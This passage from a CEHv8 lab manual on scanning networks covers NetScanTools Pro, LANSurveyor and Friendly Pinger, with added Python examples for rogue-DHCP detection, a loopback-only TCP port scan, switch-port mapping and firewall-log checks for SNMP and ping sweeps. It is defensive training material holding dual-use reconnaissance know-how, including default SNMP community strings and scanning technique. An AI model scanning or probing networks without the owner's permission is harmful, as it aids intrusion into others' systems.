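            break
        if code == 0:
            i += 1
            continue
        length = data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def parse_dhcp(pkt: bytes) -> Dict[str, Any]:
    """Decode the BOOTP header and the options a discovery tool reports."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    fields = struct.unpack(BOOTP_FMT, pkt[:236])
    opts = parse_options(pkt[240:])
    rec: Dict[str, Any] = {"op": fields[0], "xid": fields[4], "yiaddr": ip_str(fields[8]),
                           "siaddr": ip_str(fields[9]), "options": opts}
    if OPT_MSG_TYPE in opts:
        rec["msg_type"] = opts[OPT_MSG_TYPE][0]
    if OPT_SERVER_ID in opts:
        rec["server_id"] = ip_str(opts[OPT_SERVER_ID])
    if OPT_LEASE in opts:
        rec["lease"] = struct.unpack("!I", opts[OPT_LEASE])[0]
    return rec


def find_rogue_servers(packets: List[bytes], authorised: Set[str]) -> List[Dict[str, Any]]:
    """Every OFFER whose server identifier is not an authorised DHCP server."""
    rogue = []
    for pkt in packets:
        rec = parse_dhcp(pkt)
        if rec.get("msg_type") == DHCPOFFER and rec.get("server_id") not in authorised:
            rogue.append(rec)
    return rogue


# Constructed capture: the legitimate server 10.0.0.1 and an unknown server
# 10.0.0.99 both answer the same DISCOVER (same xid); the unknown one names
# itself as the default gateway, the classic sign of a rogue DHCP server.
CLIENT_MAC = bytes.fromhex("00155d000720")
SAMPLE_OFFERS = [
    build_offer(0x3903F326, CLIENT_MAC, "10.0.0.50", "10.0.0.1", "10.0.0.1", "255.255.255.0", 3600),
    build_offer(0x3903F326, CLIENT_MAC, "10.0.0.200", "10.0.0.99", "10.0.0.99", "255.255.255.0", 600),
]

if __name__ == "__main__":
    for rec in find_rogue_servers(SAMPLE_OFFERS, authorised={"10.0.0.1"}):
        print(f"unauthorised DHCP server {rec['server_id']} offered {rec['yiaddr']} "
              f"(router option {ip_str(rec['options'][OPT_ROUTER])})")
```

Running it prints the unauthorised server and the gateway it is trying to hand out. In a real capture the OFFERs arrive on a broadcast socket bound to UDP port 68; the parsing is unchanged, and the authorised set is the list of DHCP servers your network documentation says should exist.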
[About the DHCP Server Discovery Tool: Use this tool to identify active DHCP servers (IPv4 only) on your local network. It shows the IP address and settings being handed out by DHCP. This tool can also find unknown or "rogue" DHCP servers. Don't forget to right click in the results for a menu with more options. Demo limitations: None.]
[Manual Tools - ARP Scan (MAC Scan) results: Starting IPv4 Address and Ending IPv4 Address set to the 10.0.0.x range, WinPcap interface IP 10.0.0.7, Resolve IPs checked; the results list shows 10.0.0.1 and 10.0.0.2 with their MAC addresses and vendor names.]
FIGURE 7.8: Result of ARP Scan (MAC Scan)
NetScanner is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations.
FIGURE 7.10: Result of DHCP Server Discovery
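The DHCP Server Discovery tool above works by broadcasting a DHCP request and decoding whichever OFFERs come back, which is also how a defender notices a rogue server. The following Python is an added example, not NetScanTools Pro code: it builds two constructed DHCPOFFER packets (one from the lab's server 10.0.0.1, one from a made-up 10.0.0.66), decodes the BOOTP header and the options the tool displays (server identifier, offered address, subnet mask, router, DNS, lease time), and flags any server that is not on an assumed approved list.

```python
"""Decode DHCPOFFER packets and check the offering server against an approved list.

Added example, not NetScanTools Pro code. APPROVED_DHCP_SERVERS holds the lab's
legitimate server (10.0.0.1); the packets are constructed with build_offer().
"""
import ipaddress
import struct

APPROVED_DHCP_SERVERS = {"10.0.0.1"}          # the lab's real DHCP server
DHCP_MAGIC = b"\x63\x82\x53\x63"               # magic cookie that starts the options
BOOTP_HEADER = "!BBBBIHH4s4s4s4s16s64s128s"    # 236-byte fixed BOOTP header
OPTION_NAMES = {1: "subnet_mask", 3: "router", 6: "dns", 51: "lease_time",
                53: "message_type", 54: "server_id"}


def build_offer(server_ip, offered_ip, mask, router, dns, lease_secs, xid=0x3903F326):
    """Build a minimal DHCPOFFER (constructed test packet, not a capture)."""
    packed = lambda ip: ipaddress.IPv4Address(ip).packed
    header = struct.pack(
        BOOTP_HEADER,
        2, 1, 6, 0, xid, 0, 0,          # op=BOOTREPLY, htype=Ethernet, hlen=6, hops, xid, secs, flags
        b"\x00" * 4,                    # ciaddr
        packed(offered_ip),             # yiaddr: the address being offered
        packed(server_ip),              # siaddr
        b"\x00" * 4,                    # giaddr
        b"\x00" * 16, b"\x00" * 64, b"\x00" * 128,   # chaddr, sname, file
    )
    options = b"".join([
        bytes([53, 1, 2]),                          # DHCP message type 2 = OFFER
        bytes([54, 4]) + packed(server_ip),         # server identifier
        bytes([51, 4]) + struct.pack("!I", lease_secs),
        bytes([1, 4]) + packed(mask),
        bytes([3, 4]) + packed(router),
        bytes([6, 4]) + packed(dns),
        b"\xff",                                    # end option
    ])
    return header + DHCP_MAGIC + options


def parse_offer(pkt):
    """Return the fields the DHCP Server Discovery tool displays, as a dict."""
    if len(pkt) < 240 or pkt[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    info = {"yiaddr": str(ipaddress.IPv4Address(pkt[16:20]))}   # yiaddr sits at offset 16
    i = 240
    while i < len(pkt):
        code = pkt[i]
        if code == 255:                 # end of options
            break
        if code == 0:                   # pad byte
            i += 1
            continue
        length = pkt[i + 1]
        data = pkt[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError("truncated option %d" % code)
        i += 2 + length
        name = OPTION_NAMES.get(code)
        if name is None:
            continue                    # option the tool does not display
        if code == 6:                   # DNS may list several servers
            info[name] = [str(ipaddress.IPv4Address(data[j:j + 4])) for j in range(0, length, 4)]
        elif code in (1, 3, 54):
            info[name] = str(ipaddress.IPv4Address(data))
        elif code == 51:
            info[name] = struct.unpack("!I", data)[0]
        elif code == 53:
            info[name] = data[0]
    return info


def assess_offer(info, approved=APPROVED_DHCP_SERVERS):
    """List what is wrong with an offer; an empty list means it looks legitimate."""
    findings = []
    if info.get("message_type") != 2:
        findings.append("not a DHCPOFFER")
    server = info.get("server_id")
    if server not in approved:
        findings.append("unapproved (possibly rogue) DHCP server %s" % server)
    try:
        net = ipaddress.IPv4Network("%s/%s" % (info["yiaddr"], info["subnet_mask"]), strict=False)
        if ipaddress.IPv4Address(info["router"]) not in net:
            findings.append("offered gateway %s is outside %s" % (info["router"], net))
    except (KeyError, ValueError):
        findings.append("offer lacks a usable subnet mask or router option")
    return findings


if __name__ == "__main__":
    good = build_offer("10.0.0.1", "10.0.0.7", "255.255.255.0", "10.0.0.1", "10.0.0.1", 3 * 86400)
    rogue = build_offer("10.0.0.66", "10.0.0.7", "255.255.255.0", "192.0.2.1", "192.0.2.1", 600)
    for pkt in (good, rogue):
        info = parse_offer(pkt)
        print(info["server_id"], info["yiaddr"], info["subnet_mask"], assess_offer(info) or "OK")
```

The approved-server set is the whole policy: on a real network it would be populated from the DHCP servers you operate, and any offer whose server identifier is not in it is the "unknown or rogue" server the tool's dialog talks about.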
15. Click Ping Scanner in the left panel. A window will appear with information about the Ping Scanner tool. Click OK
Port Scanner is a tool designed to determine which ports on a target computer are active, i.e., being used by services or daemons.
16. Select the Use Default System DNS radio button, and enter the range of IP addresses in the Start IP and End IP boxes
17. Click Start
About the Ping Scanner (aka NetScanner) Tool (dialog text): Use this tool to ping a range or list of IPv4 addresses. This tool shows you which computers are active within a range (they have to respond to ping). Use it with any list of IPv4 addresses. To see all devices on your subnet, including those blocking ping, you can use the ARP Scan tool. You can import a text list of IPv4 addresses to ping. Don't miss this special feature in this tool: use the Do SMB/NBNS Scan to get NetBIOS records from unprotected Windows computers. Don't forget to right click in the results for a menu with more options. Demo limitations: Packet Delay (time between sending each ping) is limited to a lower limit of 50 milliseconds. Packet Delay can be as low as zero (0) ms in the full version. In other words, the full version will be a bit faster.
FIGURE 7.11: Selecting Ping Scanner Option
DHCP Server Discovery results (screenshot): local interface 10.0.0.7 (Hyper-V Virtual Ethernet Adapter #2); Discover Options: Hostname, Subnet Mask, Domain Name, DNS IP, Router IP, NTP Servers; discovered DHCP server 10.0.0.1 (server hostname 10.0.0.1), offered subnet mask 255.255.255.0, lease time 3 days.
Ping Scanner results (screenshot): Start IP 10.0.0.1, End IP 10.0.0.50, Use Default System DNS. Hosts that returned an Echo Reply: 10.0.0.1 (no hostname), 10.0.0.2 (WIN-MSSELCK4K41), 10.0.0.5 (WIN-LXQN3WR3R9M), 10.0.0.7 (WIN-D39MR5HL9E4). Additional scan tests available: Do Local ARP Scan, Do SMB/NBNS Scan, Do Subnet Mask Scan.
Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream Internet provider(s) that service a network-connected device.
FIGURE 7.12: Result of scanned IP addresses
18. Click Port Scanner in the left panel. A window will appear with information about the Port Scanner tool. Click OK
About the Port Scanner Tool (dialog text): NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER'S PERMISSION TO SCAN. Use this tool to scan a target for TCP or UDP ports that are listening (open with a service listening). Types of scanning supported: Full Connect TCP Scan (see notes below), UDP port unreachable scan, combined TCP full connect and UDP scan, TCP SYN only scan and TCP Other scan. Don't miss this special feature in this tool: after a target has been scanned, an analysis window will open in your default web browser. Don't forget to right click in the results for a menu with more options. Notes: settings that strongly affect scan speed: Connection Timeout (in milliseconds; use 200 or less on a fast network connection with nearby computers, more on a dial-up connection) and Wait After Connect (how long each port test waits before deciding that the port is not active). Demo limitations: None.
FIGURE 7.13: Selecting Port Scanner option
19. Enter the IP address in the Target Hostname or IP Address field and select the TCP Ports only radio button
20. Click Scan Range of Ports
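Steps 18-20 run a full-connect TCP scan, and the About dialog notes that Connection Timeout and Wait After Connect decide how long each port probe blocks. The Python below is an added example, not NetScanTools Pro code: it starts a throw-away listener on 127.0.0.1 so there is exactly one known open port, then probes a small range with a per-port timeout and classifies each port as open (handshake completed), closed (RST received) or filtered (no answer before the timeout). Scanning only loopback keeps the example self-contained; the listener, the port range and the 200 ms timeout are constructed values.

```python
"""Full-connect TCP port scan with a connect timeout, run against a local listener.

Added example, not NetScanTools Pro code. It only ever connects to 127.0.0.1,
where start_test_listener() opens one port so the scan has something to find.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_test_listener(host="127.0.0.1"):
    """Bind a TCP socket on an ephemeral port and accept (then drop) connections."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))                 # port 0: let the OS pick a free port
    srv.listen(8)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:             # listener was closed
                return

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def probe_port(host, port, timeout):
    """Attempt a full TCP handshake and classify the port as a connect scan does."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)               # the tool's "Connection Timeout" knob
    try:
        s.connect((host, port))         # SYN -> SYN/ACK -> ACK completed
        return port, "open"
    except socket.timeout:
        return port, "filtered"         # neither SYN/ACK nor RST before the timeout
    except ConnectionRefusedError:
        return port, "closed"           # RST came back
    except OSError:
        return port, "filtered"         # e.g. host unreachable
    finally:
        s.close()


def scan_range(host, first, last, timeout=0.2, workers=32):
    """Probe ports first..last in parallel and return {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: probe_port(host, p, timeout), range(first, last + 1))
    return dict(results)


def open_ports(scan):
    """Ports that completed the handshake, in ascending order."""
    return sorted(p for p, state in scan.items() if state == "open")


if __name__ == "__main__":
    srv, port = start_test_listener()
    try:
        result = scan_range("127.0.0.1", port - 5, port + 5)
        print("open:", open_ports(result))      # only the listener's port
    finally:
        srv.close()
```

A short timeout makes the scan fast against nearby hosts, but, exactly as the dialog warns, a port that simply has not answered yet is then reported as filtered rather than open; raise the timeout when scanning across slow links.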
Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query.
Port Scanner results (screenshot): Target Hostname or IP Address 10.0.0.1, TCP Ports only, Connect Timeout and Wait After Connect in milliseconds (1000 = 1 second). Result: port 80 (http, TCP) Port Active. Scan complete.
FIGURE 7.14: Result of Port Scanner
Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Tool/Utility: NetScan Tools Pro
Information Collected/Objectives Achieved:
ARP Scan Results:
■ IPv4 Address
■ MAC Address
■ I/F Manufacturer
■ Hostname
■ Entry Type
■ Local Address
Information for Discovered DHCP Servers:
■ IPv4 Address: 10.0.0.7
■ Interface Description: Hyper-V Virtual Ethernet Adapter #2
■ DHCP Server IP: 10.0.0.1
■ Server Hostname: 10.0.0.1
■ Offered IP: 10.0.0.7
■ Offered Subnet Mask: 255.255.255.0
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does NetScan Tools Pro support proxy servers or firewalls?
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Drawing Network Diagrams Using LANSurveyor
LANSurveyor discovers a network and produces a comprehensive network diagram that integrates OSI Layer 2 and Layer 3 topology data.
Lab Scenario
An attacker can gather information from ARP Scan, DHCP Servers, etc. using NetScan Tools Pro, as you have learned in the previous lab. Using this information an attacker can compromise a DHCP server on the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration.
In this lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks.
Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network.
In this lab, you need to:
■ Draw a map showing the logical connectivity of your network and navigate around the map
■ Create a report that includes all your managed switches and hubs
Lab Environment
To perform the lab, you need:
■ LANSurveyor, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor
■ You can also download the latest version of LANSurveyor from the link http://www.solarwinds.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the LANSurveyor tool
Lab Duration
Time: 10 Minutes
Overview of LANSurveyor
SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets and addresses reporting needs for PCI compliance and other regulatory requirements.
Lab Tasks
Install LANSurveyor on your Windows Server 2012.
Follow the wizard-driven installation steps and install LANSurveyor.
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
TASK 1: Draw Network Diagram
FIGURE 8.1: Windows Server 2012 - Desktop view
2. Click the LANSurveyor app to open the LANSurveyor window
FIGURE 8.2: Windows Server 2012 - Apps
3. Review the limitations of the evaluation software and then click Continue with Evaluation
FIGURE 8.3: LANSurveyor evaluation window
4. The Getting Started with LANsurveyor dialog box is displayed. Click
Start Scanning Network
LANsurveyor's Responder client: manage remote Windows, Linux, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files.
LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)
Getting Started with LANsurveyor dialog: What you can do with LANsurveyor: scan and map Layer 1, 2, 3 network topology; export maps to Microsoft Visio (view example map); continuously scan your network automatically. Once saved, all custom maps can be used in SolarWinds network and application management software. Links: thwack LANsurveyor forum (a community site providing SolarWinds users with useful information, tools and resources), Online Manual (the LANsurveyor Administrator Guide), Evaluation Guide (an introduction to LANsurveyor features and instructions for installing, configuring, and using LANsurveyor), Support. Button: Start Scanning Network. Check box: Don't show again.
FIGURE 8.4: Getting Started with LANSurveyor Wizard
5. The Create A Network Map window appears. To draw a network diagram, enter the IP address range in Begin Address and End Address, and click Start Network Discovery
LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember that switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.
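To place an IP node on a switch port, the mapper has to join Layer 3 data (the ARP table, IP to MAC) with Layer 2 data (each switch's forwarding table, MAC to port), because the switch itself never sees IP addresses. The Python below is an added example of that join, not LANsurveyor code; the switch names, port numbers, MAC addresses and ARP entries are constructed. It also shows the two cases the questions at the end of this lab ask about: a port that has learned several MACs is treated as an uplink (or a hub or wireless access point) rather than an end-node port, so nodes behind it cannot be pinned to a single port.

```python
"""Place IP nodes on switch ports by joining an ARP table with switch forwarding tables.

Added example, not LANsurveyor code. All switch names, ports and MAC addresses
below are constructed; the IPs follow the lab's 10.0.0.0/24 range.
"""
from collections import defaultdict

ARP_TABLE = {                     # constructed: IP -> MAC, as a router's ARP cache would show
    "10.0.0.1": "00-11-22-33-44-01",
    "10.0.0.2": "00-11-22-33-44-02",
    "10.0.0.3": "00-11-22-33-44-03",
    "10.0.0.5": "00-11-22-33-44-05",
    "10.0.0.7": "00-11-22-33-44-07",
}
FDB_ENTRIES = [                   # constructed: (switch, port, MAC), like dot1dTpFdbTable rows
    ("sw1", 1, "00-11-22-33-44-01"),
    ("sw1", 2, "00-11-22-33-44-02"),
    ("sw1", 24, "00-11-22-33-44-03"),   # sw1 port 24 is the trunk to sw2, so it has
    ("sw1", 24, "00-11-22-33-44-05"),   # learned every MAC that lives behind sw2
    ("sw1", 24, "00-11-22-33-44-07"),
    ("sw1", 24, "00-11-22-33-44-09"),
    ("sw2", 3, "00-11-22-33-44-05"),
    ("sw2", 4, "00-11-22-33-44-07"),
    ("sw2", 5, "00-11-22-33-44-03"),    # sw2 port 5 feeds a wireless access point
    ("sw2", 5, "00-11-22-33-44-09"),    # with two wireless clients behind it
    ("sw2", 24, "00-11-22-33-44-01"),   # sw2 port 24 is the trunk back to sw1
    ("sw2", 24, "00-11-22-33-44-02"),
]


def normalize_mac(mac):
    """Compare MACs regardless of case or separator style."""
    return mac.lower().replace(":", "-")


def find_uplink_ports(fdb):
    """Ports that learned more than one MAC are uplinks (or hubs/APs), not end-node ports."""
    learned = defaultdict(set)
    for switch, port, mac in fdb:
        learned[(switch, port)].add(normalize_mac(mac))
    return {sp for sp, macs in learned.items() if len(macs) > 1}


def map_ip_to_switch_port(arp, fdb):
    """Return {ip: (switch, port)} for nodes seen on exactly one access port, else {ip: None}."""
    uplinks = find_uplink_ports(fdb)
    access_ports = defaultdict(set)            # MAC -> access ports it was learned on
    for switch, port, mac in fdb:
        if (switch, port) not in uplinks:
            access_ports[normalize_mac(mac)].add((switch, port))
    placement = {}
    for ip, mac in arp.items():
        ports = access_ports.get(normalize_mac(mac), set())
        placement[ip] = next(iter(ports)) if len(ports) == 1 else None
    return placement


def unplaced_nodes(placement):
    """IPs that could not be tied to one access port (behind an AP, hub or unmanaged switch)."""
    return sorted(ip for ip, sp in placement.items() if sp is None)


if __name__ == "__main__":
    placement = map_ip_to_switch_port(ARP_TABLE, FDB_ENTRIES)
    for ip in sorted(placement):
        print(ip, "->", placement[ip] or "not placeable")
    print("uplink ports:", sorted(find_uplink_ports(FDB_ENTRIES)))
```

In the sample data 10.0.0.3 ends up unplaced: its MAC is only ever seen on ports that also carry other MACs (the trunk and the access point's port), which is exactly why a mapper can tell you which switch port an access point hangs off but not which port each wireless client is on.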
Create A New Network Map dialog: Begin Address 10.0.0.1, End Address 10.0.0.254 (following router hops requires SNMP router access); Routers, Switches and Other SNMP Device Discovery: SNMPv1 devices with community strings public, private; SNMPv2c devices with community strings public, private; SNMPv3 devices (SNMPv3 Options); Other IP Service Discovery: LANsurveyor Responders (with Responder password), Active Directory DCs, ICMP ping, NetBIOS clients, SIP clients; Mapping Speed slider (Faster/Slower); Configuration Management: Discovery Configuration, Save Discovery Configuration; buttons Start Network Discovery and Cancel.
FIGURE 8.5: New Network Map window
6. The mapping progress for the entered IP address range is displayed as shown in the following figure
Mapping Progress dialog: Searching for IP nodes, Hop 0: 10.0.0.1 - 10.0.0.254; Last Node Contacted: WIN-D39MR5HL9E4; counters for SNMP Sends, SNMP Receipts, ICMP Ping Sends, ICMP Receipts, Subnets Mapped, Nodes Mapped, Routers Mapped, Switches Mapped; Cancel button.
FIGURE 8.6: Mapping progress window
7. LANsurveyor displays the map of your network
LANsurveyor's network discovery discovers all network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address.
LANsurveyor is capable of discovering and mapping multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non-consecutive VLANs
SolarWinds LANsurveyor map view (screenshot): one network segment, 10.0.0.0/255.255.255.0, with four nodes, including WIN-D39MR5HL9E4, WIN-MSSELCK4K41 and WIN-LXQN3WR3R9M; the Overview pane lists Network Segments (1), IP Addresses (4), Domain Names (4), Node Names (4), IP Routers, LANsurveyor Responder Nodes, SNMP Nodes, SNMP Switches/Hubs, SIP (VoIP) Nodes, Layer 2 Nodes, Active Directory DCs, Groups.
FIGURE 8.7: Resulting network diagram
Lab Analysis
Document all the IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during the lab.
Tool/Utility: LANSurveyor
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1 - 10.0.0.254
IP Nodes Details:
■ SNMP Sends - 62
■ ICMP Ping Sends - 31
■ ICMP Receipts - 4
■ Nodes Mapped - 4
Network Segment Details:
■ IP Addresses - 4
■ Domain Names - 4
■ Node Names - 4
LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does LANSurveyor map every IP address to its corresponding switch or hub port?
2. Can nodes connected via wireless access points be detected and mapped?
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Mapping a Network Using Friendly Pinger
Friendly Pinger is a user-friendly application for network administration, monitoring, and inventory.
Lab Scenario
In the previous lab, you found the SNMP, ICMP Ping, Nodes Mapped, etc. details using the tool LANSurveyor. If an attacker is able to get hold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces on a router using the default community name public and disable them using the read-write community. SNMP MIBs include information about the identity of the agent's host, and an attacker can take advantage of this information to initiate an attack. Using the ICMP reconnaissance technique an attacker can also determine the topology of the target network. Attackers could use either the ICMP "Time exceeded" or "Destination unreachable" messages. Both of these ICMP messages can cause a host to immediately drop a connection.
As an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks, and block attacks by deploying firewalls on a network to filter unwanted traffic. You should be able to block outgoing SNMP traffic at border routers or firewalls. In this lab, you will learn to map a network using the tool Friendly Pinger.
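The scenario above names three things a defender should watch for: SNMP leaving the network through the border, the default community strings public and private, and ICMP echo sweeps used to learn the topology. The Python below is an added example, not part of this lab or of Friendly Pinger; it runs those checks over constructed firewall log lines in a made-up format, treating 10.0.0.0/24 as the internal range and the documentation prefixes 203.0.113.0/24 and 198.51.100.0/24 as the outside.

```python
"""Flag border-crossing SNMP, default community strings and ICMP echo sweeps in firewall logs.

Added example, not Friendly Pinger code. The log format and every line in
SAMPLE_LOG are constructed; 10.0.0.0/24 is the lab's internal range.
"""
import ipaddress
import re
from collections import defaultdict

INTERNAL_NET = ipaddress.IPv4Network("10.0.0.0/24")
DEFAULT_COMMUNITIES = {"public", "private"}     # vendor defaults named in the scenario
SNMP_PORTS = {161, 162}                          # agent and trap ports

# constructed format: <timestamp> <action> <proto> <src>[:port] -> <dst>[:port] [key=value ...]
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<proto>UDP|TCP|ICMP) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?::(?P<sport>\d+))? -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?::(?P<dport>\d+))?(?P<extra>.*)$"
)

SAMPLE_LOG = """\
2012-08-22T11:20:01 ALLOW UDP 10.0.0.5:51234 -> 203.0.113.9:161 community=public
2012-08-22T11:20:03 ALLOW UDP 10.0.0.7:40001 -> 10.0.0.1:161 community=private
2012-08-22T11:20:05 ALLOW UDP 10.0.0.7:40002 -> 10.0.0.1:161 community=s3cr3t-ro
2012-08-22T11:20:10 ALLOW ICMP 198.51.100.7 -> 10.0.0.1 type=8
2012-08-22T11:20:10 ALLOW ICMP 198.51.100.7 -> 10.0.0.2 type=8
2012-08-22T11:20:10 ALLOW ICMP 198.51.100.7 -> 10.0.0.3 type=8
2012-08-22T11:20:11 ALLOW ICMP 198.51.100.7 -> 10.0.0.5 type=8
2012-08-22T11:20:11 ALLOW ICMP 198.51.100.7 -> 10.0.0.7 type=8
2012-08-22T11:20:30 ALLOW TCP 10.0.0.7:50010 -> 203.0.113.50:443
"""
SAMPLE_LOG_LINES = SAMPLE_LOG.strip().splitlines()


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"]) if rec["dport"] else None
    rec["extra"] = dict(kv.split("=", 1) for kv in rec["extra"].split() if "=" in kv)
    return rec


def is_internal(ip):
    return ipaddress.IPv4Address(ip) in INTERNAL_NET


def analyze(lines, sweep_threshold=4):
    """Return findings as dicts with line number (None for aggregate findings), kind and detail."""
    findings = []
    echo_targets = defaultdict(set)      # external source -> internal hosts it pinged
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] == "UDP" and rec["dport"] in SNMP_PORTS:
            if is_internal(rec["src"]) != is_internal(rec["dst"]):
                findings.append({"line": n, "kind": "snmp_border",
                                 "detail": "SNMP %s -> %s crosses the network border" % (rec["src"], rec["dst"])})
            community = rec["extra"].get("community")
            if community in DEFAULT_COMMUNITIES:
                findings.append({"line": n, "kind": "default_community",
                                 "detail": "default community '%s' used by %s" % (community, rec["src"])})
        if (rec["proto"] == "ICMP" and rec["extra"].get("type") == "8"
                and not is_internal(rec["src"]) and is_internal(rec["dst"])):
            echo_targets[rec["src"]].add(rec["dst"])
    for src, targets in echo_targets.items():
        if len(targets) >= sweep_threshold:
            findings.append({"line": None, "kind": "icmp_sweep",
                             "detail": "%s sent echo requests to %d internal hosts" % (src, len(targets))})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG_LINES):
        print(f["line"], f["kind"], f["detail"])
```

The sweep threshold is the tuning knob: a single external ping is normal, while one source touching most of a /24 within a minute is the pattern a ping-sweep tool produces, and it is the same behaviour the Ping Scanner and Friendly Pinger wizard exhibit when they run against your own range.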
Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network.
In this lab, you need to:
■ Discover a network using discovery techniques
■ Diagram the network topology
■ Detect new devices and modifications made in network topology
■ Perform inventory management for hardware and software assets
Lab Environment
To perform the lab, you need:
■ Friendly Pinger, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger
■ You can also download the latest version of Friendly Pinger from the link http://www.kilievich.com/fpinger/download.htm
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Friendly Pinger tool
Lab Duration
Time: 10 Minutes
Overview of Network Mapping
Network mapping is the study of the physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems running on networks. This technique detects new devices and modifications made in network topology. You can perform inventory management for hardware and software assets.
Friendly Pinger performs the following to map the network:
■ Monitors network device availability
■ Notifies you if any server wakes up or goes down
■ Pings all devices in parallel at once
■ Audits hardware and software components installed on the computers over the network
Lab Tasks
1. Install Friendly Pinger on your Windows Server 2012
2. Follow the wizard-driven installation steps and install Friendly Pinger
3. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
TASK 1: Draw Network Map
FIGURE 9.1: Windows Server 2012 - Desktop view
4. Click the Friendly Pinger app to open the Friendly Pinger window
FIGURE 9.2: Windows Server 2012 - Apps
5. The Friendly Pinger window appears, and Friendly Pinger prompts you
to watch an online demonstration.
6. Click No
Friendly Pinger main window (screenshot): menu bar File, Edit, View, Ping, Notification, Scan, FWatcher, Inventory, Help; the demonstration map shows Internet, Mail and Shortcut servers, a hub and workstations; the status bar reads "click the client area to add a new device...".
FIGURE 9.3: FPinger Main Window
You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.
Friendly Pinger will display the IP address of your computer and will offer an exemplary range of IP addresses for scanning.
To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. As the intermediate addresses are determined, they will be displayed as a list in this window and the route will be displayed as red arrows on the map.
7. Select File from the menu bar and select the Wizard option
Friendly Pinger File menu (screenshot): New, Open..., Reopen, Update, Save, Save As..., Close, Close All, Save As Image..., Print..., Lock..., Create Setup..., Options... (F9), Exit.
FIGURE 9.4: FPinger Starting Wizard
8. To create the initial map of the network, type a range of IP addresses in the specified field, as shown in the following figure, and click Next
Wizard dialog: Local IP address: 10.0.0.7. The initial map will be created by querying the DNS server for information about the following IP addresses: 10.0.0.1-20. You can specify a more exact range of scanning to speed up this operation, for example 10.129-135.1-5.1-10. Timeout: 1000. A timeout allows the search to be extended, but you can miss some addresses.
FIGURE 9.5: FPinger Initializing IP address range
9. The wizard will then scan the IP addresses in the network and list them
10. Click Next
Scanning allows you to learn a lot about your network. Thanks to its unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network.
The map occupies the greater part of the window. Right-click it. In the context menu that appears, select "Add" and then "Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture.
The device is displayed as an animated picture if it is pinged, and as a black and white picture if it is not pinged.
